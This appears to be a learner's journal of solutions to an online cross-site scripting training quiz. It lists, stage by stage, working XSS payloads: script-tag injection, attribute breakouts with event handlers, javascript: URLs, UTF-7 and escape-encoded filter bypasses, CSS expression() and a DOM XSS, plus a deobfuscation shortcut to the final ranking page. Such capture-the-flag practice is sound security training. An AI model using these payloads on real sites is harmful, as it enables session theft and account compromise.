Here’s my journal to solve all the XSS Challenges writed by yamagata21 on http://xss-quiz.int21h.jp/, This is an starter level to people who want to learn some cross-site scripting and its several ways to inject on differents browsers.
XSS Challenges http://xss-quiz.int21h.jp Stage1: http://xss-quiz.int21h.jp Solution: <script>alert(document.domain);</script> Stage2: http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf66eedce70 Solution: "><script>alert( alert(document.domain))</script> Stage3: http://xss-quiz.int21h.jp/stage-3.php?sid=d362dd49b96c30f3e9a4a6ea0abafb0cef59ed2d Solution: The input in text box is properly escaped ("><script>alert(document.domain);</script> in select) Stage4: http://xss-quiz.int21h.jp/stage_4.php?sid=d47663090ecc0b8d55ae73ee3753ead52c63103e Solution: "><script>alert(document.domain);</script> in hidden field Stage5: http://xss-quiz.int21h.jp/stage--5.php?sid=e9dd07b6e86c5314a2e574e887faa9482de330bf Solution: " onmouseover="alert(document.domain);" type="text changing lenght in input text Stage6: http://xss-quiz.int21h.jp/stage-no6.php?sid=b76ebfa651652f2c22f8ddbe264941287667706c Solution: " onmouseover="alert(document.domain);" Stage7: http://xss-quiz.int21h.jp/stage07.php?sid=f433ab35e367d5a94100aa4e0f694c3e63d67105 Solution: x onmouseover=alert(document.domain); Stage8: http://xss-quiz.int21h.jp/stage008.php?sid=4301b185b563c91208e0af232d7f016885e863e0 Solution: javascript:alert(document.domain); Stage9: utf-7: Not working for me, extracted next level from deobfusucate url. http://xss-quiz.int21h.jp/stage_09.php?sid=558484a712d793c446e3dc409601eaf126e73d25 Solution:+ACI- onmouseover=+ACI-alert(document.domain)+ADsAIg- x=+ACI- p1=1%2bACI- onmouseover=%2bACI-alert(document.domain)%2bADsAIg-&charset=euc-jp Stage10: http://xss-quiz.int21h.jp/stage00010.php?sid=1b96f5c206c187751811fb9267a02c109c7e1276 Solution: " onmouseover=alert(document.domdomainain); x=" Stage11: http://xss-quiz.int21h.jp/stage11th.php?sid=756e90d9a168c24e2abbc43d1f4409ce6ff70de3 Solution: "><a href="javascr ipt:alert(document.domain);">XSS</a> Passed with IE Stage12: http://xss-quiz.int21h.jp/stage_no012.php?sid=188b00a4305c62ea415313484b57a9a3b59df5cb Solution: ``onmouseover=alert(document.domain); Passed with IE Stage13: http://xss-quiz.int21h.jp/stage13_0.php?sid=49a2e48f78ade853ecd72a274e49102a9b096fad Solution: xss:expression(alert(document.domain));" Passed with IE Stage14: http://xss-quiz.int21h.jp/stage-_-14.php?sid=cdfba63593b9c07d7b1b7e41790aa5de3ac4bcd8 Solution: xss:expre/**/ssion(alert(document.domain));" Stage15: http://xss-quiz.int21h.jp/stage__15.php?sid=26ac2a0522c04a788c217fd8d7847aab1626f726 Solution: \\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e Stage16: http://xss-quiz.int21h.jp/stage00000016.php?sid=67973758e07ac879612c31437a2e1fb283b760e7 Solution: \\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e Skipped: (Old IE not avalaible) http://xss-quiz.int21h.jp/stage-No17.php?sid=53342e06720dc7d4fa4224eb3c13bf966d823056 http://xss-quiz.int21h.jp/stage__No18.php?sid=170f1d30f88cf627174033ec5b73578276b94fc3 Stage19: http://xss-quiz.int21h.jp/stage_--19.php?sid=787870a01e603b0c0d0d6c464c0595883e2c10ce Solution: It's DOMXSS Twitter's bug (24 Sept.2010) -- #!javascript:alert(document.domain) Clear Stage: Need to entry the ranking deobfuscating js on this part of the code: ty = ""; o = unescape("foejoh"); for (var i = 0; i < o.length; i++) { var y = o.charCodeAt(i); ty += String.fromCharCode(y - 1) } ty = escape(ty); if (ty == "ending") { sj = "\062\060"; alert("Congratulations!! All Stages Clear!!!"); alert("\x52\x61\x6e\x6b\x49\x6e\x67" + sj + ".php"); document.location = "\x52\x61\x6e\x6b\x49\x6e\x67" + sj + ".php" } else { document.all("msg").innerHTML = "<span id='h3'>Congratulations!!</span> " + "Next stage <a href=\"" + ty + "\">" + ty + "</a>." } so "\x52\x61\x6e\x6b\x49\x6e\x67" + sj + ".php" is RankIng20.php :-)
Final URL that allow entry directly in the clear stage. http://xss-quiz.int21h.jp/RankIng20.php
Ranking: http://xss-quiz.int21h.jp/ranking.php
嘻嘻